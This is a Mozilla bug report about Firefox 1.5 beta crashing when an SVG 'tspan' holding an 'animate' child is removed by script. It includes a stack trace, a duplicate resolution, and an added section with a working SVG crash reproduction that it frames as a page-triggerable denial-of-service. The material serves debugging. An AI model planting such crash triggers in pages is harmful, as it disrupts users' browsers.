Closed Bug 308177 Opened 19 years ago Closed 19 years ago

Crashes FF1.5beta when 'tspan' with child element is removed from parent

Product / Component: Core :: SVG (defect)
Version: 1.8 Branch
Platform: x86, Windows XP
Priority: Not set
Severity: critical
Status: RESOLVED DUPLICATE of bug 307314
Reporter: doug
Assignee: Unassigned
Keywords: crash

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4

In the test case at http://svg-whiz.com/svg/mozilla/tspan-removeChild-error.svg,
when a tspan which has a child element (in this case, an 'animate' tag) is
removed from a parent 'text' element, the browser will crash immediately. Note
that this does not happen to a 'circle' element with an 'animate' tag when it is
removed from a parent 'g' element.

This is a script issue with the method 'removeChild'.



Reproducible: Always

Steps to Reproduce:
1. Open the test file (http://svg-whiz.com/svg/mozilla/tspan-removeChild-error.svg)
2. Click on the text that says "If you remove this 'tspan' (by clicking on it),
FF will crash"
3. Browser crashes.

Actual Results:  
Browser crashes.

Expected Results:  
The 'tspan' element should be removed, with no stability problems.

This use case is not unusual, and may cause many existing SVG WebApps to crash FF.
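A minimal, constructed reproduction of the pattern described above (added here; it is not the svg-whiz.com test file, whose contents are not on this page, and the animate attributes, colours and geometry are assumptions). Clicking the 'tspan' calls removeChild on its parent 'text' while the 'tspan' still holds an 'animate' child; the 'circle' inside a 'g' is the control case the report says does not crash. Since the crash is reachable from ordinary page script and a single click, any SVG page can use it to take down the browser, which is why a null-pointer crash in a DOM mutation path is a denial-of-service issue and not only a stability one.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!-- Constructed reproduction of the report's pattern (assumption: mirrors,
     not copies, the svg-whiz.com test case). -->
<svg xmlns="http://www.w3.org/2000/svg" width="420" height="200">
  <script type="text/ecmascript"><![CDATA[
    // Crashing case per the report: remove a 'tspan' that has an 'animate'
    // child from its parent 'text' element.
    function removeClickedTspan(evt) {
      var tspan = evt.target;
      tspan.parentNode.removeChild(tspan);
    }

    // Control case per the report: a 'circle' with an 'animate' child
    // removed from a parent 'g' does not crash.
    function removeClickedCircle(evt) {
      var circle = evt.target;
      circle.parentNode.removeChild(circle);
    }
  ]]></script>

  <text x="20" y="40" font-size="16">
    <tspan onclick="removeClickedTspan(evt)">If you remove this 'tspan' (by clicking on it), FF will crash
      <!-- child element inside the tspan: the condition the report ties to the crash -->
      <animate attributeName="fill" values="black;red;black" dur="2s" repeatCount="indefinite"/>
    </tspan>
  </text>

  <g>
    <circle cx="60" cy="130" r="30" fill="blue" onclick="removeClickedCircle(evt)">
      <animate attributeName="r" values="30;40;30" dur="2s" repeatCount="indefinite"/>
    </circle>
  </g>
</svg>
```

Save it as a .svg file and open it directly in the affected build; the 'evt' argument in the onclick attributes is the SVG 1.1 event object made available to event attribute code.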
No crash on trunk, possible branch-only.
Version: Trunk → 1.8 Branch
Confirming on branch. We crash in nsSVGTSpanFrame::GetCoveredRegion on
dirty_region->Combine(temp, &accu_region) since dirty_region is a null pointer.
I don't have time to look at this in detail right now, but here's the top of the
stack.

gklayout.dll!nsCOMPtr<nsISVGRendererRegion>::operator->()  Line 849 + 0x22	C++
gklayout.dll!nsSVGTSpanFrame::GetCoveredRegion()  Line 475 + 0x8	C++
gklayout.dll!nsSVGTextFrame::RemoveFrame(nsIAtom * aListName=0x00000000, nsIFrame * aOldFrame=0x04119168)  Line 414 + 0x10	C++
gklayout.dll!nsFrameManager::RemoveFrame(nsIFrame * aParentFrame=0x04118fe0, nsIAtom * aListName=0x00000000, nsIFrame * aOldFrame=0x04119168)  Line 705	C++
gklayout.dll!nsCSSFrameConstructor::ContentRemoved(nsIContent * aContainer=0x043eba20, nsIContent * aChild=0x043c0ed8, int aIndexInContainer=1, int aInReinsertContent=0)  Line 9786 + 0x15	C++
gklayout.dll!PresShell::ContentRemoved(nsIDocument * aDocument=0x042c2408, nsIContent * aContainer=0x043eba20, nsIContent * aChild=0x043c0ed8, int aIndexInContainer=1)  Line 5526	C++
gklayout.dll!nsDocument::ContentRemoved(nsIContent * aContainer=0x043eba20, nsIContent * aChild=0x043c0ed8, int aIndexInContainer=1)  Line 2403	C++
gklayout.dll!nsGenericElement::RemoveChildAt(unsigned int aIndex=1, int aNotify=1)  Line 2793	C++
gklayout.dll!nsGenericElement::RemoveChild(nsIDOMNode * aOldChild=0x043c0f14, nsIDOMNode * * aReturn=0x0012d674)  Line 3255 + 0x11	C++
gklayout.dll!nsSVGTextElement::RemoveChild(nsIDOMNode * aOldChild=0x043c0f14, nsIDOMNode * * aReturn=0x0012d674)  Line 75 + 0x14	C++
Status: UNCONFIRMED → NEW
Ever confirmed: true
Keywords: crash
Probably a dup of bug 307314 (fixed on trunk, waiting branch approval).
Indeed. Thanks for the report anyway Doug.

*** This bug has been marked as a duplicate of 307314 ***
Status: NEW → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE